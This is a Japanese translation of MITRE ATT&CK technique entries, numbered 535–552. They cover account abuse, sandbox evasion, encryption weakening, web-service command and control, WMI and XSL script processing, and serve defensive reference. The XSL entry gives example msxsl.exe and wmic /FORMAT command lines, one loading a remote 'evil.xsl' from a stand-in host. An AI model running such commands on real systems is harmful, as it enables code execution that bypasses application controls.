T1078.004 有効なアカウントクラウドアカウント 敵対者は、初期アクセス、持続アクセス、特権エスカレーション、防御回避の手段として、クラウドアカウントの認証情報を取得し、悪用する可能性があります。クラウドアカウントは、ユーザー、リモートサポート、サービス、またはクラウドサービスプロバイダやSaaSアプリケーション内のリソースの管理に使用するために、組織によって作成および構成されたアカウントです。場合によっては、クラウドアカウントは、Window Active Directoryなどの従来のID管理システムとフェデレーションされることもあります。(引用:AWS Identity Federation)(引用:Google Federating GC)(引用:Microsoft Deploying AD Federation)

クラウドアカウントの妥協された認証情報は、オンラインストレージアカウントやデータベースから機密データを取得するために使用される可能性があります。また、クラウドアカウントへのアクセスは、[Trusted Relationship](https://attack.mitre.org/techniques/T1199)を悪用して、ネットワークへの初期アクセスを得ることができます。ドメインアカウント](https://attack.mitre.org/techniques/T1078/002)と同様に、連携されたクラウドアカウントが侵害されると、敵は環境内でより容易に横方向に移動できるようになる可能性があります。
535
T1078.001 有効なアカウントデフォルトのアカウント 敵対者は、初期アクセス、持続アクセス、特権エスカレーション、防御回避などの手段として、デフォルトアカウントの認証情報を取得し、悪用することがあります。既定のアカウントとは、WindowsシステムのGuestやAdministratorアカウントのように、OSに組み込まれているアカウントのことです。また、デフォルトアカウントには、AWSのrootユーザーアカウントやKubernetesのデフォルトサービスアカウントなど、他の種類のシステムやソフトウェア、デバイスに工場出荷時に設定されているアカウントも含まれます。(引用:Microsoft Local Accounts Feb 2019)(引用:AWS Root User)(引用:Threat Matrix for Kubernetes)

デフォルトアカウントは、クライアントマシンに限らず、ネットワーク機器やコンピュータアプリケーションなど、社内用、オープンソース用、商用を問わず、機器にあらかじめ設定されているアカウントも含まれます。ユーザー名とパスワードの組み合わせがあらかじめ設定されているアプライアンスは、インストール後に変更しない組織にとっては、敵対者の格好の標的となるため、深刻な脅威となります。同様に、敵対者は、公開されたり盗まれたりした[Private Key](https://attack.mitre.org/techniques/T1552/004)やクレデンシャル資料を利用して、[Remote Services](https://attack.mitre.org/techniques/T1021)経由でリモート環境に正規に接続することもあります。(引用:Metasploit SSH Module)
536
T1078.002 有効なアカウントドメインアカウント 敵対者は、初期アクセス、持続性、特権エスカレーション、または防御回避を得る手段として、ドメインアカウントの認証情報を入手し、悪用することがあります。(引用:TechNet Credential Theft) ドメインアカウントとは、Active Directory Domain Servicesによって管理されるアカウントであり、そのドメインの一部であるシステムやサービス全体のアクセスと権限が設定される。ドメインアカウントには、ユーザ、管理者、サービスが含まれます。(引用:Microsoft AD Accounts)

敵対者は、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)やパスワードの再利用などの様々な手段で、高レベルの特権を持つドメインアカウントを侵害し、ドメインの特権的なリソースへのアクセスを可能にすることがあります。
537
T1078.003 有効なアカウントローカルアカウント 敵対者は、初期アクセス、持続性、特権の昇格、防御の回避などの手段として、ローカル アカウントの認証情報を取得し、悪用することがあります。

ローカルアカウントは、[OS クレデンシャルダンピング](https://attack.mitre.org/techniques/T1003)によって特権を昇格させたり、認証情報を取得するために悪用されることもあります。パスワードの再利用により、ネットワーク上の一連のマシンでローカルアカウントを悪用して、特権の昇格や横移動を行うことができます。
538
T1125 ビデオキャプチャー 敵対者は、コンピュータの周辺機器(内蔵カメラやウェブカメラなど)やアプリケーション(ビデオ通話サービスなど)を利用して、情報収集を目的としたビデオ録画をキャプチャすることができます。また、動画ファイルの代わりに、指定した間隔でデバイスやアプリケーションから画像をキャプチャする場合もあります。

マルウェアやスクリプトを使用して、OSやアプリケーションが提供する利用可能なAPIを介してデバイスとやり取りし、動画や画像をキャプチャする場合もあります。動画や画像のファイルはディスクに書き込まれ、後で流出することがあります。この技術は、被害者の画面をキャプチャするのではなく、ビデオ録画のために特定のデバイスやアプリケーションを使用する点で、[Screen Capture](https://attack.mitre.org/techniques/T1113)とは異なります。

macOSにおいては、FruitFlyやProtonなど、ユーザーのウェブカメラを録画するマルウェアが数種類存在します。(引用:オブジェクティブ・シー2017のレビュー)
539
T1497 仮想化/サンドボックスの回避 侵入者は、仮想化環境や解析環境を検知して回避するために、さまざまな手段を用いることがあります。これには、仮想マシン環境(VME)やサンドボックスを示すアーティファクトの存在をチェックした結果に基づいて行動を変えることも含まれます。敵対者がVMEを検出した場合、マルウェアを変更して被害者との関係を断ち切ったり、インプラントの中核機能を隠したりすることがあります。また、二次的なペイロードや追加のペイロードを投下する前に、VMEのアーティファクトを探すこともあります。

セキュリティ監視ツール(Sysinternals、Wiresharkなど)や、解析や仮想化に関連する他のシステムアーティファクトをチェックするなど、「仮想化/サンドボックス回避」(https://attack.mitre.org/techniques/T1497)を達成するためにいくつかの方法を使用することができます。また、敵対者は、解析環境であるかどうかを判断するために、正当なユーザー活動をチェックすることもあります。その他の方法としては、一時的なサンドボックス内での動作を回避するために、マルウェアのコード内にスリープタイマーやループを使用することがあります。(引用:Unit 42 Pirpi 2015年7月号)

540
T1497.001 仮想化/サンドボックスの回避。システムチェック 侵入者は、仮想化環境や解析環境を検知して回避するために、さまざまなシステムチェックを行うことがあります。これには、仮想マシン環境(VME)やサンドボックスを示すアーティファクトの存在をチェックした結果に基づいて動作を変更することも含まれます。敵対者がVMEを検出した場合、マルウェアを変更して被害者との関係を断ち切ったり、インプラントの中核機能を隠したりすることがあります。また、二次的なペイロードや追加のペイロードを投下する前に、VMEのアーティファクトを探すこともあります。

具体的な確認事項は、ターゲットや敵対者によって異なりますが、システム情報を取得し、VMEのアーティファクトを探すために、[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)、[PowerShell](https://attack.mitre.org/techniques/T1059/001)、[System Information Discovery](https://attack.mitre.org/techniques/T1082)、[Query Registry](https://attack.mitre.org/techniques/T1012)などの動作を伴うことがあります。敵対者は、メモリ、プロセス、ファイルシステム、ハードウェア、レジストリなどでVMEアーティファクトを探すことができます。

チェック項目には、ホスト/ドメイン名などの一般的なシステムプロパティや、ネットワークトラフィックのサンプルなどがあります。

その他の一般的なチェック項目としては、これらのアプリケーションに固有の実行中のサービス、システムにインストールされているプログラム、仮想マシンアプリケーションに関連する文字列のメーカー/製品フィールド、VME固有のハードウェア/プロセッサ命令などが挙げられます。(引用:McAfee Virtual Jan 2017) VMWareなどのアプリケーションでは、敵対者は特別なI/Oポートを使用してコマンドを送信したり出力を受け取ったりすることもできます。

ファンの存在、温度、オーディオデバイスなどのハードウェアチェックも、仮想環境を示す証拠を集めるために使用される可能性があります。敵対者は、これらのデバイスから特定の読み取り値を照会することもできます(引用:Unit 42 OilRig Sept 2018)。
541
T1497.003 Virtualization/Sandbox Evasion:Time Based Evasion(時間ベースの回避 侵入者は、仮想化環境や解析環境を検知・回避するために、様々な時間ベースの方法を採用することがあります。これには、稼働時間やシステムクロックなどの時間ベースのプロパティを列挙することや、タイマーやその他のトリガーを使用して仮想マシン環境(VME)やサンドボックス(特に自動化されていたり、限られた時間しか動作しないもの)を回避することが含まれます。

敵対者は、プログラムによるスリープコマンドやネイティブシステムのスケジューリング機能(例:[Scheduled Task/Job](https://attack.mitre.org/techniques/T1053))を使用して、マルウェアの機能を最初の実行時に遅延させるなど、時間ベースの様々な回避方法を採用する可能性があります。遅延は、特定の被害者の条件が満たされるのを待ったり(例:システム時間、イベントなど)、分析や精査を避けるためにスケジュールされた[Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)を採用したりすることもあります。

敵対者は、サンドボックスや分析環境を検出するための指標として時間を利用することもあります。特に、時間のメカニズムを操作して、より長い時間の経過をシミュレートしようとするものがあります。例えば、敵対者は、sleep関数の実行前後の環境のタイムスタンプの期待値をサンプリングして計算することで、時間を加速させているサンドボックスを特定できるかもしれません。(引用:ISACA Malware Tricks)
542
T1497.002 仮想化/サンドボックスの回避。ユーザーの行動に基づくチェック 侵入者は、仮想化環境や解析環境を検出して回避するために、さまざまなユーザアクティビティチェックを採用することがあります。これには、仮想マシン環境(VME)やサンドボックスを示すアーティファクトの存在をチェックした結果に基づいて行動を変えることも含まれます。敵対者がVMEを検出した場合、マルウェアを変更して被害者との関係を断ち切ったり、インプラントの中核機能を隠したりすることがあります。また、二次的なペイロードや追加のペイロードを投下する前に、VMEのアーティファクトを探すこともあります。

敵対者は、マウスの動きやクリックの速度/頻度(引用:Sans Virtual Jan 2016)、ブラウザの履歴、キャッシュ、ブックマーク、ホームやデスクトップなどの共通ディレクトリ内のファイル数などの変数に基づいて、ホスト上のユーザの活動を検索することがあります。他の方法では、マクロを起動する前にドキュメントが閉じるのを待ったり(引用:Unit 42 Sofacy Nov 2018)、ユーザーが埋め込み画像をダブルクリックして起動するのを待ったりするなど、悪意のあるコードが起動する前に、システムに対する特定のユーザーのインタラクションに依存する場合があります(引用:FireEye FIN7 April 2017)。
543
T1600 暗号化の弱体化 敵対者は、ネットワーク機器の暗号化機能を侵害して、データ通信を保護するための暗号化を回避することがあります。(引用:Cisco Synful Knock Evolution)

暗号化は、送信されるネットワークトラフィックを保護し、その機密性(不正な開示からの保護)と完全性(不正な変更からの保護)を維持するために使用することができます。暗号は、平文メッセージを暗号文に変換するために使用され、関連する復号鍵がなければ復号するのに計算量が多くなります。一般的に、暗号鍵が長いほど、暗号解読のコストが高くなります。

敵対者は、ネットワークトラフィックの暗号化を行うデバイスを侵害し、操作することができます。例えば、[Modify System Image](https://attack.mitre.org/techniques/T1601)、[Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)、[Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002)などの動作により、ネットワークトラフィックを安全に暗号化するデバイスの能力に悪影響を与えたり、排除したりすることができます。これにより、不正な開示のリスクが高まり、データ操作、クレデンシャルアクセス、または収集活動が容易になる可能性があります。(引用:Cisco Blog Legacy Device Attacks)
544
T1600.002 Weaken Encryption:暗号化ハードウェアの無効化

ルーター、スイッチ、ファイアウォールなどの多くのネットワーク機器は、ネットワーク上の通信を安全に行うために、ネットワークトラフィックを暗号化しています。これらの機器には、暗号化処理の速度を大幅に向上させ、悪意のある改ざんを防ぐために、専用の暗号化ハードウェアが搭載されていることがよくあります。敵対者がこのようなデバイスをコントロールする場合、例えば[Modify System Image](https://attack.mitre.org/techniques/T1601)を使用して専用ハードウェアを無効にし、一般的なプロセッサで暗号化を実行するソフトウェアを使用させることがあります。これは通常、ソフトウェアにおける暗号の強度を弱める攻撃([Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)など)と組み合わせて使用されます。(引用元:Cisco Blog Legacy Device Attacks)
545
T1600.001 暗号化を弱める。キースペースの削減

敵対者は、平文を暗号文に変換する際にソフトウェアが使用する鍵のサイズを小さくすることで、侵害されたネットワーク機器の暗号化ソフトウェアを弱体化させることができます(例えば、数百または数千バイトからわずか数バイトに)。その結果、敵対者は、鍵なしで保護された情報を復号するために必要な労力を劇的に減らすことができます。

敵対者は、デバイスの構成を変更するために、[Modify System Image](https://attack.mitre.org/techniques/T1601)を通じてシステムに導入された[Network Device CLI](https://attack.mitre.org/techniques/T1059/008)の特殊なコマンドを使用して、使用する鍵のサイズやその他の暗号化パラメータを変更することがあります。(引用元:Cisco Blog Legacy Device Attacks)
546
T1102 ウェブサービス 敵対者は、侵害されたシステムとの間でデータを中継する手段として、既存の正規の外部 Web サービスを使用する場合があります。人気のあるWebサイトやソーシャルメディアがC2のメカニズムとして機能することで、ネットワーク内のホストが侵害前にすでにそれらと通信している可能性があるため、かなりのカバーが可能になります。GoogleやTwitterで提供されているような一般的なサービスを利用することで、敵対者が予想されるノイズの中に隠れることが容易になります。

Webサービスを利用することで、バックエンドのC2インフラをマルウェアのバイナリ解析による発見から守り、同時に運用の回復力を高めることができます(このインフラは動的に変更される可能性があるからです)。
547
T1102.002 ウェブサービス。双方向のコミュニケーション 敵対者は、Webサービス チャネルを介して侵害されたシステムにコマンドを送信したり、侵害されたシステムから出力を受け取ったりする手段として、既存の正規の外部Webサービスを使用することがあります。侵害されたシステムは、一般的なWebサイトやソーシャルメディアを利用して、コマンド&コントロール(C2)命令をホストすることがあります。感染したシステムは、それらのコマンドからの出力をWebサービス チャネルを介して返送することができます。リターントラフィックは、利用しているWebサービスに応じてさまざまな方法で発生します。たとえば、リターントラフィックは、感染したシステムがフォーラムにコメントを投稿したり、開発プロジェクトにプルリクエストを発行したり、Webサービス上でホストされているドキュメントを更新したり、Tweetを送信したりする形をとることがあります。

人気のWebサイトやソーシャルメディアがC2のメカニズムとして機能することは、ネットワーク内のホストが侵害される前にすでにそれらと通信している可能性があるため、かなりの量のカバーが可能です。GoogleやTwitterで提供されているような一般的なサービスを利用することで、敵対者が予想されるノイズの中に隠れることが容易になります。ウェブサービスプロバイダは、一般的にSSL/TLSによる暗号化を採用しているため、敵対者はさらなる保護を受けることになります。
548
T1102.001 ウェブサービス。デッドドロップリゾルバ 敵対者は、既存の正規の外部Webサービスを利用して、追加のコマンド&コントロール(C2)インフラを指す情報をホストすることがあります。敵対者は、デッドドロップリゾルバと呼ばれるコンテンツを、ドメインやIPアドレスが埋め込まれた(多くの場合、難読化/暗号化された)Webサービスに掲載することがあります。感染すると、被害者はこれらのリゾルバにアクセスし、リダイレクトされることになります。

人気のウェブサイトやソーシャルメディアがC2のメカニズムとして機能することは、ネットワーク内のホストが侵害前にすでにそれらと通信している可能性があるため、かなりのカバーが可能です。GoogleやTwitterで提供されているような一般的なサービスを利用することで、敵対者が予想されるノイズの中に隠れることが容易になります。

デッドドロップ リゾルバを使用することで、バックエンドのC2インフラをマルウェアのバイナリ解析による発見から守り、同時に運用の回復力も高めることができます(このインフラは動的に変更される可能性があるため)。
549
T1102.003 ウェブサービス。一方通行のコミュニケーション 敵対者は、侵害されたシステムにコマンドを送信する手段として、既存の正規の外部Webサービスを使用することがありますが、その際、Webサービス チャネルを介してリターン出力を受け取ることはありません。侵害されたシステムは、一般的なWebサイトやソーシャルメディアを利用して、コマンド&コントロール(C2)命令をホストすることがあります。これらの感染したシステムは、コマンドからの出力を別のC2チャネル(別のWebサービスなど)を介して送り返すことを選択できます。また、敵対者がシステムに命令を送信して応答を求めない場合、感染したシステムは出力をまったく返さないこともあります。

人気のあるWebサイトやソーシャルメディアがC2のメカニズムとして機能することは、ネットワーク内のホストが感染前にすでにそれらと通信している可能性があるため、かなりの隠蔽効果があると考えられます。GoogleやTwitterで提供されているような一般的なサービスを利用することで、敵対者が予想されるノイズの中に隠れることが容易になります。ウェブサービスプロバイダは、一般的にSSL/TLSによる暗号化を採用しているため、敵対者はさらなる保護を受けることになります。
550
T1047 Windows Management Instrumentation 敵対者は、Windows Management Instrumentation(WMI)を悪用して実行を実現することがあります。WMIは、Windowsの管理機能で、Windowsシステムのコンポーネントにローカルおよびリモートでアクセスするための統一された環境を提供します。ローカルおよびリモートアクセスにはWMIサービス、リモートアクセスにはサーバーメッセージブロック(SMB)(引用:Wikipedia SMB)およびリモートプロシージャコールサービス(RPCS)(引用:TechNet RPC)に依存しています。RPCSはポート135で動作します。(引用:MSDN WMI)

敵対者はWMIを使用してローカルおよびリモートのシステムと対話し、ディスカバリーのための情報収集やラテラル・ムーブメントの一環としてのファイルのリモート実行など、多くの戦術的機能を実行する手段として使用することができます。(引用:FireEye WMI SANS 2015) (引用:FireEye WMI 2015)
551
T1220 XSLスクリプト処理 侵入者は、XSLファイル内にスクリプトを埋め込むことで、アプリケーション制御を回避し、コードの実行を不明瞭にすることができます。XSL(Extensible Stylesheet Language)ファイルは、XMLファイル内のデータの処理やレンダリングを記述するためによく使用されます。複雑な操作をサポートするために、XSL規格では様々な言語の埋め込みスクリプトをサポートしています。(引用:Microsoft XSLT Script Mar 2017)

敵対者はこの機能を悪用して、アプリケーションの制御を迂回しながら任意のファイルを実行する可能性があります。Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127)と同様に、Microsoft common line transformation utility binary (msxsl.exe)(引用:Microsoft msxsl.exe)をインストールし、ローカルまたはリモート(URL参照)のXSLファイル内に埋め込まれた悪意のあるJavaScriptを実行するために使用することができます。(引用:Penetration Testing Lab MSXSL July 2017) msxsl.exeはデフォルトではインストールされないため、敵対者はおそらくドロップされたファイルと一緒にパッケージ化する必要があります。(引用:Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exeは、XMLソースファイルとXSLスタイルシートの2つの主要な引数を取ります。XSLファイルは有効なXMLなので、敵対者は同じXSLファイルを2回呼び出すことができます。msxsl.exeを使用する場合、敵対者はXML/XSLファイルに任意のファイル拡張子を与えることもできます。(引用:XSL Bypass 2019年3月)

コマンドラインの例:(引用:Penetration Testing Lab MSXSL 2017年7月)(引用:XSL Bypass 2019年3月)

* <code>msxsl.exe customers[.]xml script[.]xsl</code>
* <code>msxsl.exe script[.]xsl script[.]xsl</code>
* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>

「Squiblytwo」と呼ばれるこの手法の別のバリエーションでは、[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)を使用して、XSLファイル内でJScriptまたはVBScriptを起動します。(引用: LOLBAS Wmic) この手法は、ローカル/リモートのスクリプトを実行することもでき、[Regsvr32](https://attack.mitre.org/techniques/T1218/010)/「Squiblydoo」と同様に、信頼できるWindowsの組み込みツールを利用します。Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)の/FORMATスイッチを利用すれば、どのようなエイリアスであっても悪用することができます。(引用:XSL Bypass Mar 2019)

コマンドライン例:(引用:XSL Bypass Mar 2019)(引用:LOLBAS Wmic)

* ローカルファイル:<code>wmic process list /FORMAT:evil[.]xsl</code>
* リモートファイル:<code>wmic os get /FORMAT: "https[:]//example[.]com/evil[.]xsl"</code>。
552